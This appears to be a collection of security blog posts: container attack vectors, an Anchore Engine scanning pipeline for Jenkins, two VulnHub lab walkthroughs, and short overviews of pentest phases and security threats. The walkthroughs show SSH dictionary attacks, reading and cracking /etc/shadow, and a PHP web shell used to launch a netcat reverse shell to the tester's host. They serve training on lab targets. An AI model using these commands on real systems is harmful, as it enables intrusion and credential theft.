Container attack vectors

We live in a containerised world. Container solutions like Docker are now so extended that they are not a niche thing any more or a buzzword, they are mainstream. Multiple companies use it and, the ones that do not are dreaming with it probably.

The only problems are that they are still something new. The adoption of them has been fast and, it has arrived like a storm to all kind of industries that use technology. The problem is that from a security point of view we, as an industry, do not have all the awareness we should have. Containers and, especially, containers running on cloud environments are hidden partially the fact that they exist and they need to be part of our security considerations. Some companies use them thinking they are completely secure, trusting the cloud providers or the companies that generate the containers take care of everything and, even, for less technology focus business, they are an abstraction and not real and tangible thing. They are not the old bare metal servers, the desktop machines or the virtual machines they were used to it, and till a certain point, they worried because they were things that could be touched.

All of that has made that while security concerns for web applications are first-level citizens, not as much as it should but the situation has improved a lot on the last few years, security concerns about containers seem to be the black sheep of the family, no one talks about it. And, this is not right. It should have the same level of concern and the same attention should be paid to it and, be part of the development life cycle.

In the same way that web applications can be attacked in multiple ways, containers have their own attack vectors, some of which we are going to see here. We will see that some of the attack vectors can be easily compared with known attack vectors on spaces we are more aware like web applications.

Vulnerable application code

Containers package applications and third-party dependencies that can contain known flaws or vulnerabilities. There are thousands of published vulnerabilities that attackers can take advantage to exploit our systems if found on the applications running inside the containers.

The best to try to avoid running container with known vulnerabilities is to scan the images we are going to deploy and, not just as a one-time thing. This should be part of our delivery pipelines and, the scans should apply all the time. In addition to known vulnerabilities, scanners should try to find out-of-date packages that need an update. Even, some available scanners try to find some possible malware on the images.

Badly configured container images

When configuring how a container is going to be built some vulnerabilities can be introduced by mistake or if not the proper attention is paid to the building process that can be later exploited by attackers. A very common example is to configure the container to run with unnecessary root permissions giving it more privileges on the host than it really needs.

Build machine attacks

As any piece of software, the one we use to run CI/CD pipelines and build container images can be attacked successfully and, attackers can add malicious code to our containers during the build phase obtaining access to our production environment once the containers have been deploy and, even, utilising these compromised containers to pivot to other parts of our systems or networks.

Supply chain attacks

Once containers have been built they are stored in registries and retrieved or “pulled” when they are going to be run. Unfortunately, no one can guarantee the security of this registries and, an attacker can compromise the registry an replace the original image with a modified one including a few surprises.

Badly configured containers

When creating configuration files for our containers, i.e. a YAML file, we can make some mistakes and add configurations to the containers we did not need. Some possible examples are unnecessary access privileges or unnecessary open ports.

Vulnerable host

Containers run on host machines and, in the same way, we try to ensure containers are secure host should be too. Some times they run old versions of orchestration component with known vulnerabilities or other components for monitorisation. A good idea is to minimise the number of components installed on the host, configure them correctly and apply security best practices.

Exposed secrets

Credentials, tokens or passwords are all of them necessary if we want our system to be able to communicate with other parts of the system. One risk is the way we supply the container and the applications running in it these secret values. There are different approaches with varying levels of security that can be used to prevent any leakage.

Insecure networking

The same than non containerised applications, containers need to communicate using networks. some level of attention will be necessary to set up secure connections among components.

Container escape vulnerabilities

Containers are prepared to run on isolation from the hosts were they are running, in general, all container runtimes like “containerd” or “CRI-O” have been heavily tested and are quite reliable but, as always, there are vulnerabilities to be discovered. Some of these vulnerabilities can let malicious code running inside a container escape out into the host. Due to the severity of this, some stronger isolation mechanisms can be worth to consider.

Some other risks related to containers but not directly been containers can be:

  • Attacks to code repositories of application deployed on the containers poisoning them with malicious code.
  • Hosts accessible from the Internet should be protected as expected with other tools like firewalls, identity and access management systems, secure network configurations and others.
  • When container run under an orchestrator, i.e. Kubernetes, a door to new attack vectors is open. Configurations, permission or access not controlled properly can give attackers access to our systems.

As we can see some of the attack vectors are similar to the one existing in more mature areas like networking or web application but, due to the abstraction and the easy-to-use approach, the security on containers, unfortunately, is left out the considerations.

Reference: “Container Security by Liz Rice (O’Reilly). Copyright 2020 Vertical Shift Ltd., 978-1-492-05670-6”

Container attack vectors

Container Security: Anchore Engine

Nowadays, containers are taking over the world. We still have big systems, legacy system and, obviously, not every company out there has enough speed to migrate to containerized solutions but, wherever you look, people are talking about containers.

And, if you look in the opposite direction, people are talking about security. Breaches, vulnerabilities, systems not properly patched, all kind of problems that put at risk enterprise security and users data.

With all of this, and it is not new, projects involving both topics have been growing and growing. The ecosystem is huge, and the amount of options is starting to be overwhelming.

We have projects like:

  • Docker Bench for Security: The Docker Bench for Security is a script that checks for dozens of common best-practices around deploying Docker containers in production. The tests are all automated and are inspired by the CIS Docker Benchmark v1.2.0.
  • Clair: Clair is an open-source project for the static analysis of vulnerabilities in application containers (currently including apps and docker).
  • Cilium: Cilium is open source software for providing and transparently securing network connectivity and load-balancing between application workloads such as application containers or processes. Cilium operates at Layer 3/4 to provide traditional networking and security services as well as Layer 7 to protect and secure use of modern application protocols such as HTTP, gRPC and Kafka. Cilium is integrated into common orchestration frameworks such as Kubernetes and Mesos.
  • Anchore Engine: The Anchore Engine is an open-source project that provides a centralized service for inspection, analysis and certification of container images. The Anchore Engine is provided as a Docker container image that can be run standalone or within an orchestration platform such as Kubernetes, Docker Swarm, Rancher, Amazon ECS, and other container orchestration platforms.
  • OpenSCAP: The OpenSCAP ecosystem provides multiple tools to assist administrators and auditors with assessment, measurement, and enforcement of security baselines. We maintain great flexibility and interoperability, reducing the costs of performing security audits.
  • Dagda: Dagda is a tool to perform static analysis of known vulnerabilities, trojans, viruses, malware & other malicious threats in docker images/containers and to monitor the docker daemon and running docker containers for detecting anomalous activities.
  • Notary: The Notary project comprises a server and a client for running and interacting with trusted collections. See the service architecture documentation for more information.
  • Grafaes: An open artefact metadata API to audit and govern your software supply chain.
  • Sysdig Falco: Falco is a behavioural activity monitor designed to detect anomalous activity in your applications. Powered by sysdig’s system call capture infrastructure, Falco lets you continuously monitor and detect container, application, host, and network activity – all in one place – from one source of data, with one set of rules.
  • Banyan Collector: Banyan Collector is a light-weight, easy to use, and modular system that allows you to launch containers from a registry, run arbitrary scripts inside them, and gather useful information.

As we can see, there are multiple tools within this container security scope. These are just some example.

In this article, we are going to explore a bit more Archore Engine. We are going to create a basic Jenkins pipeline to scan one container. Fro this, we are going to need:

  • A repository in GitHub with a simple dockerized project. In my case, I will be using this one. It’s a simple Spring Boot app with a hello endpoint and a very simple ‘Dockerfile’.
  • We are going to need a Docker Hub repository to store our image. I will be using this one.
  • Docker and docker-compose.

And, that’s all. Let’s go.

We can see in the next image the pipeline we are going to implement:

Install Anchore Engine

We just need to execute a few commands to have Anchore Engine up and running.

mkdir -p ~/aevolume/config 
mkdir -p ~/aevolume/db/
cd ~/aevolume/config && curl -O https://raw.githubusercontent.com/anchore/anchore-engine/master/scripts/docker-compose/config.yaml && cd - 
cd ~/aevolume
curl -O https://raw.githubusercontent.com/anchore/anchore-engine/master/scripts/docker-compose/docker-compose.yaml

After that, we should see a folder ‘aevolume’ with a content similar to:

Running Anchore Engine

As we can see, the previous step has provided us with a docker-compose file to run in an easy way Anchore Engine. We just need to execute the command:

docker-compose up -d

When docker-compose finishes, we should be able to see the two containers for Anchore Engine executing. One for the application itself and one for the database.

Install the Anchore CLI

It is not necessary but, it is going to be very useful to debug integration problem if we have (I had a few the first time). For this, we just need to execute a simple command that it will make the executable ‘anchore-cli’ available in our system.

pip install anchorecli

Install the Jenkins plugin

Now, we start working on the integration with Jenkins. The first step is to install the Anchore integration on Jenkins. We just need to go to the Jenkins management plugin area and install one called ‘Anchore Container Image Scanner Plugin’.

Configure Anchore in Jenkins

There is one more step we need to take to configure the Anchore plugin in Jenkins. We need to provide the engine URL and the access credentials. This credentials can be found in the file ‘~/aevolume/config/config.yaml’.

Configure Docker Hub repository

The last configuration we need to do, it is to add our access credential for our Docker Hub repository. I recommend here to generate an access token and not to use our real credentials. Once we have the access credential, we just need to add them to Jenkins.

Create a Jenkins pipeline

To be able to run our builds and to analyze our containers, we need to create a Jenkins pipeline. We are going to use the script feature for this. The script will look like this:

pipeline {
    environment {
        registry = "fjavierm/anchore_demo"
        registryCredential = 'DOCKER_HUB'
        dockerImage = ''
    }
    agent any
        stages {
            stage('Cloning Git') {
                steps {
                    git 'https://github.com/fjavierm/demo.git'
                }
            }

            stage('Building image') {
                steps {
                    script {
                        dockerImage = docker.build registry + ":$BUILD_NUMBER"
                    }
                }
            }

            stage('Container Security Scan') {
                steps {
                    sh 'echo "docker.io/fjavierm/anchore_demo:latest `pwd`/Dockerfile" > anchore_images'
                    anchore name: 'anchore_images'
                }
            }
            stage('Deploy Image') {
                steps{
                    script {
                        docker.withRegistry( '', registryCredential ) {
                            dockerImage.push()
                        }
                    }
                }
            }
            stage('Cleanup') {
                steps {
                sh'''
                    for i in `cat anchore_images | awk '{print $1}'`;do docker rmi $i; done
                '''
            }
        }
    }
}

This will create a pipeline like:

Execute the build

Now, we just need to execute the build and see the results:

Conclusion

With this, we finish the demo. We have installed Anchore Engine, integrate it with Jenkins, run a build and check the analysis results.

I hope it is useful.

Container Security: Anchore Engine

WALKTHROUGH: De-ICE: S1.100

The purpose of this article is to describe, for educational purposes (see disclaimer), the pentesting of a vulnerable image created for training purposes called “De-ICE: S1.100”.

Information

https://www.vulnhub.com/entry/de-ice-s1100,8/

Scenario

The scenario for this LiveCD is that a CEO of a small company has been pressured by the Board of Directors to have a penetration test done within the company. The CEO, believing his company is secure, feels this is a huge waste of money, especially since he already has a company scan their network for vulnerabilities (using nessus). To make the BoD happy, he decides to hire you for a 5-day job; and because he really doesn’t believe the company is insecure, he has contracted you to look at only one server – a old system that only has a web-based list of the company’s contact information.

The CEO expects you to prove that the admins of the box follow all proper accepted security practices, and that you will not be able to obtain access to the box. Prove to him that a full penetration test of their entire corporation would be the best way to ensure his company is actually following best security practices.

Configuration

PenTest Lab Disk 1.100: This LiveCD is configured with an IP address of 192.168.1.100 – no additional configuration is necessary.

Download

ISO image

I am going to skip the configuration process because it is trivial and it is not the purpose of this article.

All the used for this article are or can be installed in a Kali Linux distribution.

Once we have both machines running, our Kali Linux and the training image, the first step should be checking if they are in the same network and we can see the training machine from testing machine. We can use the “ping” command, but in this case is going to fail, or the “netdiscover” command, just to list a couple of them. In my case, I have used “netdiscover”:

netdiscover -i eth1 -r 192.168.1.0/24
01-netdiscover
Figure 1. Netdiscover execution result

After we are sure we can reach the training machine, the first step is to take a look around checking the web page there is available. We can see a brief explanation about the challenge and not much more than that. But, we can see a very important thing here. Reading carefully the page we can see there are some email related with the company.

Head of HR: Marie Mary - marym@herot.net (On Emergency Leave)
Employee Pay: Pat Patrick - patrickp@herot.net
Travel Comp: Terry Thompson - thompsont@herot.net
Benefits: Ben Benedict - benedictb@herot.net
Director of Engineering: Erin Gennieg - genniege@herot.net
Project Manager: Paul Michael - michaelp@herot.net
Engineer Lead: Ester Long - longe@herot.net
Sr.System Admin: Adam Adams - adamsa@herot.net
System Admin (Intern): Bob Banter - banterb@herot.net
System Admin: Chad Coffee - coffeec@herot.net

We should pay special attention to the last three because they are admin users.

This gives us a few information:

  • Names of people that is working in the company.
  • Valid emails.
  • Examples of how they are creating usernames.

It is time to start exploring what the training system is offering. For this purpose, I am going to use “nmap”.

nmap -p 1-65535 -T4 -A -v 192.168.1.100
02-nmap
Figure 2. nmap results

As we can see, there are a few port open in the training machine:

  • 21: FTP service. And, something is not right here.
  • 22 SSH service
  • 25 SMTP service
  • 80 HTTP service
  • 110 POP3 service
  • 143 IMAP service

Considering we do not have any other information, we need to start thinking in what we are missing. We already have some valid email, with this information we can create a list of possible users in the system. In addition, we can add users like “root” or “admin” or similar users that are always useful to have. In this case, our list can be something like:

root
admin
aadams adamsa adamsad adam.adams
bbanter banterb banterbo bob.banter
ccoffee coffeec coffeech chad.coffee

Now, that we have a list of possible users, we can try to connect to the SSH service. For this, we are going to use the tool “medusa” trying to do a dictionary attack to see if we are lucky.

medusa -h 192.168.1.100 -U users.txt -P passwds.txt -M ssh -v 4 -w 0
03-medusa
Figure 3. medusa result

As we can see, we have been able to break one password. Let’s use it and try to connect using SSH.

ssh aadams@192.168.1.100
04-ssh
Figure 4. SSH connection with aadams

As we can see, we are able to connect. Now that we are inside, let’s see what “sudo” commands we have available.

sudo -l
05-sudo
Figure 5: Available tools

We can see we can use the tool “cat” to read file content. Then, let’s check the files “/etc/passwd” and “/etc/shadow”.

06-cat_shadow
Figure 6: /etc/shadow content

With a simple copy and paste we can move the content of both files to our machine to try to use “John” to discover new passwords, specially the “root” password. After the copies are done, we can “unshadow” the files to have everything in one file.

unshadow pasad_file.txt shadow_file.txt > root_password.txt
07-unshadow
Figure 7. unshadowing the passwd and shadow files

Trying to save a little bit of time, and because we already have an operative user “aadams” we can copy the “root” credential to a file and try to break just the “root” password.

john just_root.txt
08-john
Figure 8. John results

Great! We have the “root” password. Now we can try to connect with SSH using the “root” credentials.

ssh root@192.168.1.100
09-no_root_ssh
Figure 9. SSH connection as “root” failing

As we can see, we are not able to connect as “root” user using SSH. But, we are still having the “root” password and a valid user “aadams”. Let’s try to login as “root” using our valid user

10-aadams_root
Figure 10: We are root!

Usually, now that we are root we can close the case and deliver our report, but going around a little bit we can find an interesting file, and considering this is a training exercise, we can play a bit more. The file is this one

11-found_file
Figure 11. Curious file
12-encripted_file
Figure 12. encripted file, maybe
bin walk salary_dec2003.csv.enc
15-binwalk
Figure 13. confirming is an excerpted file

What do we know about the file:

  • It is encrypted with OpenSSL.
  • It was in a folder only accessible by the “root” user. We can think that maybe it is going to be encrypted using the “root” password we have.
  • We know that we do not know the type of cipher.

We can check the type of ciphers that OpenSSL offers.

openssl enc help
18-ciphers
Figure 14. Available ciphers

Let’s try on of them out of curiosity to see how an error looks like, and after that, let’s try to figure out how to try/apply all of them to find the correct one.

openssl enc -d -aes-128-cbc -in salary_dec2003.csv.enc -out salary_dec2003.csv -k tarot
16-decripting_file
Figure 15. decripting file

I guess that it is because it is just a training environment but the one that does the job is the first one. No more attempts are needed. In the real world probably we should write a script to test all the cipher available.

17-files_content
Figure 16. File decrypted

With this our scenario finish. We have access to the machine, we have root permissions and we have decrypted the “salary” file, our job is done. It has been interesting but I thing that it is just possible because the passwords where not very strong.

WALKTHROUGH: De-ICE: S1.100

Walkthrough: 21LTR: Scene 1

The purpose of this article is to describe, for educational purposes (see disclaimer), the pentesting of a vulnerable image created for training purposes called “21LTR: Scene 1”.

Information

https://www.vulnhub.com/entry/21ltr-scene-1,3/

Scene 1

Your pentesting company has been hired to perform a test on a client company’s internal network. Your team has scanned the network and you have been assigned one of the discovered systems. Perform a test on this system starting from the beginning of your chosen methodology and submit your report to the project manager at scenes AT 21LTR DOT com

Scope Statement

The client has defined a set of limitations for the pentest: – All tests will be restricted to the systems identified on the 192.168.2.0/24 network. – All commands run against the network and systems must be supplied in the form of script files packaged with the submission of the report – A final report indicating all identified vulnerabilities and exploits will be provided to the company’s engineering department within 90 days of the start of this engagement.

Configuration

Scenario Pentest Lab Scene 1:

This LiveCD is configured with an IP address of 192.168.2.120 – no additional configuration is necessary.

Download

ISO image

Torrent file (Magnet)

I am going to skip the configuration process because it is trivial and it is not the purpose of this article.

All the used for this article are or can be installed in a Kali Linux distribution.

Once we have both machines running, our Kali Linux and the training image, the first step should be checking if they are in the same network and we can see the training machine from testing machine. We can use the “ping” command or the “netdiscover” command, just to list a couple of them. In my case, I have used “netdiscover”:

netdiscover -i eth1 -r 192.168.2.0/24
001-netdiscover
Figure 1. Netdiscover execution result

After we are sure we can reach the training machine, the first step is to take a look around checking the web page there is available. In this case the web page give us a few information and nothing interesting but, the source code os the page give us the first good information. As a comment in the page, we can find some credentials

login_pass_in_source_code
Figure 2. Credentials found in the source code

There is nothing else to do here but to be sure we are not missing some pages or folders let’s run a different tools against the web page to check it. The tool is going to be “dirb”

dirb http://192.168.2.120
005-dirb.png
Figure 3. dirb results

We can see that a couple of folders have been found, but the only one that seems to respond in the browser is the “/logs”. Unfortunately, returns a “Forbidden” error.

It is time to start exploring what the training system is offering. For this purpose, I am going to use “nmap”.

nmap -p 1-65535 -T4 -A -v 192.168.2.120
002-nmap.png
Figure 4. nmap results

As we can see, there are a few port open in the training machine:

  • 21: FTP service
  • 22: SSH service
  • 80: HTTP service
  • 10001: In this point, I am not sure what is this. In addition, it does not show always in the scanner results.

Considering we have some credential, lets try to connect to the different services. There is no luck with the SSH access but the FTP allows us to connect and try to explore. Unfortunately, we can just file one file.

003-ftp_connection.png
Figure 5. FTP exploration results

Considering we have found a folder “/logs” previously and we have found a file called “backup_log.php”, one good idea is to try the URL we can build with them.

http://192.168.2.120/logs/backup_log.php
004-browser
Figure 6. Page content

It looks like some kind of backup log system, but it is not giving us enough information to do anything else.

At this point, I must recognize that I was a bit lost and running out of ideas, then, in the meantime I went for a walk I left the “Wireshark” tools running. Why? Because both are good ideas, go for a walk when you are block and because you never know what you can find in the network. After taking a look to the traffic I saw some (a lot) calls asking for the IP address “192.168.2.240”.

006-wireshark
Figure 7. Wireshark results

At this point, I decided to change the IP of my testing machine to this address and turn on again the “Wireshark” to see what happen and, I have one interesting event. Apparently the training machine wants to establish a connection with “192.168.2.240” (my machine now) with the port 10000.

007-wireshark2
Figure 8. Wireshark results

Then, lets allow this connection to see what happen. To allow this, let’s execute “necat” and wait again.

nc -lvvp 10000 > output

Here wee can see the connection is done in some point and we have what it looks like a binary file called “output”. After a some investigation, we can see it is a “tar.gz” file (using exiftool) and we cannot find anything interesting in the file, but it is clear that it is a backup file.

008-wireshark3
Figure 9. Wireshark result
exiftool --list output
exif
Figure 10. exiftool result
014-downloaded file
Figure 11. Exploring backup file

Linking that in the “nmap” there is a port 10001 we do not know what it is, we have in the server a page that shows backup result messages and that we are obviously downloading a backup file, we can infer that maybe the port 10001 just open when its waiting for a response about the sent backup. To test this theory, let’s try to connect to the port 10001 when the backup is sent. Because we do not know when it is going to be send, let’s just try to connect multiple times.

while true; do nc -v 192.168.2.120 10001 && break; sleep 1; clear; done

After a few minutes, the connection is stablished and we can type a few instructions.

009-wireshark4
Figure 12. Wireshark results

Apparently, they are doing nothing but, when we go again to the backup log messages pages we can see what we have been typing.

010-browser
Figure 13. Messages typed

Then, let’s try to type something that allow us to do something useful and to have access to the training machine. Let’s try to inject a PHP on-line webcell:

<?php echo exec($_GET["cmd"]);?>

And type something to check if it is working.

curl --silent 192.168.2.120/logs/backup_log.php?cmd=id
011-curl to cmd.png
Figure 14. Connection result

As we can see (end of the image) we are connected as “apache” to the training machine. Now, let’s try to have a proper shell where to execute command and take a look properly to the system. We are going to a port in our system and try to connect with a shell process from the training machine.

nc -lvvp 443
curl --silent 192.168.2.120/logs/backup_log.php?cmd=/usr/bin/nc%20192.168.2.240%20443%20-e%20/bin/sh

And, success, we have our shell.

012-remote conexion
Figure 15. Shell in the training machine

The next step it is to try to find the credential files and see their content but, unfortunately, we can just list the file “/etc/passwd” and the credentials are (I guess) in “/etc/shadow” that I cannot list.

Our next step is going around the machine to see what we can find. In this case, after some exploration, we can find a folder “/media/USB_1/Stuff/Keys” with two very interesting files:

  • authorized_keys: With the key of the authorized users to connect with SSH. In this case “hbeale”
  • id_rsa: The private key to connect to SSH
015-user_for_ssh
Figure 16. User with SSH access
016-private_key
Figure 17. Private key

Coping the key to our system we can try to connect.

ssh hbeale@192.168.2.120
017-ssh_to_remote
Figure 18. SSH access

Checking what command we can execute as “sudo”. We can see we can use the tools “cat” to read file content.

sudo -l
018-available_no_pass
Figure 19. Available tools

Then, let’s check the file “/etc/shadow” again.

019-etc_shadow
Figure 20. /etc/shadow content

Here we can see the hash for the “root” user and copy it to a file in our system (root_password). Let’s try to increase our privileges cracking the hash with “John” (the tools John) and using one of the dictionaries that comes with Kali.

john --wordlist=rockyou.txt root_password
020-john_root
Figure 21. John’s execution

We are lucky, John has done its job properly and we have the password “formula1”. Let’s try it.

021-root
Figure 22. We are root!

With this our scenario finish. We have access to the machine and we have root permissions, our job is done. It has been funny and frustrating but I do not thing there would be the first one without the second one.

Walkthrough: 21LTR: Scene 1

Network security zoning

The world is a wild place specially when we are talking about the Internet environment. There are multiple threads and multiple sources of attack. Organizations, in general, need to find the best ways to protect themselves and guarantee the continuity of their business online.

On of the best ways to build their defenses is creating different layers or zones in their infrastructures. Network security zoning mechanism allows an organization to manage a secure network environment by selecting the appropriate security levels for different zones of Internet and Intranet networks. It helps to effectively monitoring and controlling inbound and outbound traffic.

There are some different zones that we can define, the decision about which ones are going to be present in a concrete infrastructure needs to be carefully analyzed in each one of the cases. As a example, we are going to see a few of the possible zones we can implement.

  • Internet zone: Obviously, this is not a zone that we can implement, is something that it is there and we just connect. In general, we can define this zone like an uncontrolled zone that it is outside of the boundaries of our organization.
  • Internet DMZ: This is a controlled zone that provides a buffer between the internal network and the Internet.
  • Production network zone: This is a restricted zone and it has strict access controls to prevent uncontrolled traffic.
  • Intranet zone: It is a controlled zone with not heavy restriction, it is supposed to be in a controlled environment and only trusted systems and/or traffic can be  found here.
  • Management network zone: Highly restricted area or zone, with strong controls and strict policies to restrict the access of non authorized users and traffic.

As you can see, this is just a basic example list to exemplify some of the different zones we can implement in our networks.

See you.

Network security zoning

Penetration testing phases

When we talk about penetration tests, a lot of people think that it is just a matter of starting our computers, run a few tools against the objective, do a bit of magic and, done, the pentester discovers a few vulnerabilities. But the truth is far from this point of view, maybe in the films is something like that but not in real life.

A pen-testing is a well-defined process, it has its methodologies like OSSTMM, OWASP and some others. All of them, define concrete steps and procedures that a pentester should follow to perform a proper task.

One of the things that it is well defined is the different phases of a pen-testing. We can find well-defined phases, each one of them specifying what needs to be done and when it needs to be done. The tools you use to complete each one of these phases are not important in this article, in this article, it is just important the process.

We can find five different phases in a pentest. Each one with its boundaries, objectives and goals well defined. These five phases are:

  • Reconnaissance
  • Scanning
  • Gaining access
  • Maintaining access
  • Clearing tracks

Let see a little introduction of the different phases.

Reconnaissance

Reconnaissance refers to the preparatory phase where an attacker seeks to gather information about a target prior to launching the attack. In other words, find all the information at our fingertips. The attackers are going to use all the public sources that they can reach to find information about the target. And we are not talking just about the company, we are talking about employees, business, operations, network, system, competitors, … everything we can learn about our target. We can use web pages, social networks, social engineering, … The objective is to know as much as we can about the victim and the elements around it.

We can find two types of reconnaissance:

  • Passive: Involves acquiring information without directly interact with the target.
  • Active: Involves interacting with the target directly by any means.

Scanning

Scanning refers to a pre-attack phase where the attacker scans the network for specific information on the basis of information gathered during the reconnaissance. In general, in this step, we are going to use port scanners, vulnerability scanners and similar tools to obtain information about the target environment like live machines, ports in each one of these machines, services running, OS details, … All this information will allow us to launch the attack.

Gaining access

Gaining access refers to the point where the attacker obtains access to a machine or application inside the target’s network. Part of this phase is when the attacker tries to escalate privileges to obtain complete control of the system or, based on the access the attacker has,  it tries to compromise other systems in the network. Here we have multiple tools and different possibilities like password cracking, denial of service, buffer overflows, session hijacking, …

Maintaining access

Maintaining access refers to the phase where the attacker tries to retain the ownership of the system and make future accesses to the compromised system easier, especially in the case that the way the attacker has used to compromise the system is fixed. The attacker can do multiple things like creating users in the system, install their own applications and hide them, install backdoors, rootkits or trojans even, in some cases, the attacker can secure the compromised machine to avoid other attackers to control the machine.

Clearing tracks

Clearing tracks refers to the activities carried out by an attacker to hide malicious acts. In this phase, the attacker tries to remove all the pieces of evidence about the machine being compromised trying to avoid, in the first place, the detection and, in second place, obstructing the prosecution.

These are the different phases of a pen-testing, and any service offered should perform all of them properly. In addition, one of the best things about performing all the phases correctly and in the adequate order is that we can use the information found in a previous phase to complete the next phase.

See you.

Penetration testing phases

Elements of Information Security

Information security is a state of well-being of information and infrastructure in which the possibility of theft, tampering and disruption of information and services is kept low or tolerable.

The information security has the next elements:

  • Confidentiality: Assurance that the information is accessible only to those authorized to have access.
  • Integrity: The trustworthiness of data or resources in terms of preventing improper and unauthorized changes.
  • Availability: Assurance that the systems responsable for delivering, storing and processing information are accessible when required by the authorized users.
  • Authenticity: Authenticity refers to the characteristic of a communication, document or any data that ensures the quality of being genuine.
  • Non-repudiation: Guarantee that the sender of a message cannot later deny having sent the message and that the recipient cannot deny having received the message

See you.

Elements of Information Security

Security threads

Nowadays, we have so much technology coming out that’s being consumed by consumers or being pushed out to the consumers and, one of the main problems it’s that they have no idea how they operate. They just know that it works and they have this or that cool features but they don’t imagine that each one of these new features can come with new vulnerabilities. We can discuss here about the point that the normal user don’t need to know about vulnerabilities, security or proper configuration for the new devices or features, however this should be a thought of the past. Today, everyone should have a basic knowledge about all this stuff. It´s clear that, except in a few cases, it’s going to be a big difference between the knowledge the standard user has and the knowledge an IT person has, it’s obvious, one of them it’s just using the products and the others are managing the products and, almost all the time, doing it for companies or enterprises that expect a certain level of expertise. But, it doesn’t matter who you are or what you do, the simple and undeniable truth is that everyone nowadays should have, at least, a few knowledge about the threads they have around when they are using technology because today, technology is everywhere.

This article is focused in IT persons, but I think that it can be useful for everyone that uses technology and it’s aware that they need to know or they are just curious.

There are some different issues that can be considered threads in the world of computer security and any one involved in this world should be aware of, to try to avoid or mitigate the efects. This is just a list of threads, not an explanation of how to mitigate their effects. We can divide threads in different categories:

  • Host threads: An I’m not talking just about servers that are used to deploy applications, in this category fall servers, workstations, tablets and cell phones anything that have an operative system installed and can be connected to the Internet. We can have in this category things like:
    • Footprinting: Every computer or every operative system answers in different ways to the same questions. This allows attackers to investigate and obtain information about our infrastructure.
    • Physical security: Thinks like don’t lock your laptop when you are not around, don’t lock your screen or expend a lot of time bastioning your server when it’s quite easy to have physical access to it.
    • Password threads: It shouldn’t be enough with having a password, we should have proper passwords defined in a password policy and with enough restrictions to consider them secure.
    • Malware: A thread in expansion nowadays, day after day we can see more cases of malware, we should have control about what is installed in our host and what the host is executing. We shouldn’t install things just using the “Next” button without read the different screens in the wizards, this is how you end up with new bars in your browser or applications that you don’t know what they are.
    • Denial of Service: It does’t matter if it’s intentional or non-intentional, the result is that your system is not going to be available, you can lose money, customers, reputation, …
    • Unauthorized access: No one that it’s not allowed to use a system should be allowed to log into the system, period.
    • Privilege escalation: It’s closely related with the previous one, if I can access illegitimately the system I can try to obtain more privileges in it. Creating accounts with more privileges for example.
    • Backdoors: One of the things that attackers are going to do after gain access to our systems, it’s to create a backdoor to be able to return later and access the system again in a easier way. One very common way to do that is creating service accounts. For this reason this is one of the things that we should revise.
  • Natural and physical threads:
    • Natural disasters: Earthquakes, hurricanes, floods or any other natural disaster. It’s obvious that try to prevent this kind of events it’s out of discussion but we should have the proper plans, procedures or policies to try to mitigate their effects.
    • Physical threads: Like thefts, dropping the laptop or the cell phone, anything that can affect directly to the physical device. We need to be prepared to mitigate the loss of information.
    • Power: Power problems can affect our devices or components, can destroy or affect data  or stress our devices.
    • End of life: Every device has life and in some point it needs to be retired. Maybe because is not powerful enough to match your business requirements or just because it’s too old. But any of our devices, in general, it’s going to have a HD that it has been storing  our information in some point and we should take care of this. And, I’m not talking just about laptops or PCs, I’m including printers or any other device that has a HD. The wrong treatment of these devices can derivate in a leak of information.
  • Application threads:
    • Configuration threads: Misconfigurations or default configurations can be a great threat for our devices and our organizations. We should pay attention to everything that we are configuring, it does’t matter if it’s hardware or software. We should read the manuals properly and even, if it’s necessary, look for some training.
    • Buffer overflows: This is an application trying to store more information in the buffer than what intended to hold. This usually is caused by errors during the development. Any in-house development should be reviewed carefully, any open source code should be reviewed carefully and all the scripts or codes our developers or IT persons copy and paste from the Internet should be reviewed.
    • Data and Input Validation: All the information coming into our application needs to be previously validated to avoid injection. Code injection, SQL injection, any injection.
  • Human threads: With this point we can write a book, and probably a few of them. The biggest and one of the more dangerous threads is us. We are humans and we are falible. Exists a hacking discipline focus in this kind of thread: Social engineering. How to obtain from people what you need. We need to train our people, we need to have policies and mitigation measures and we need to be prevented, there is no other way.
  • Network threads:
    • Sniffing and Eavesdropping: Anyone can be sniffing in your network trying to obtain information to perform and attack.
    • ARP Spoffing: Trying to simulate the attacker computer is the default gateway or any other interesting computer in your network.
    • Denial of Service: Yes, here we have this thread again.

This is just a list of some general threads we can find around us all the time and something about we need to take care when we are auditing our systems or trying to penetrate them. I hope it´s useful, at least, to have them in the same place to review it.

See you.

Security threads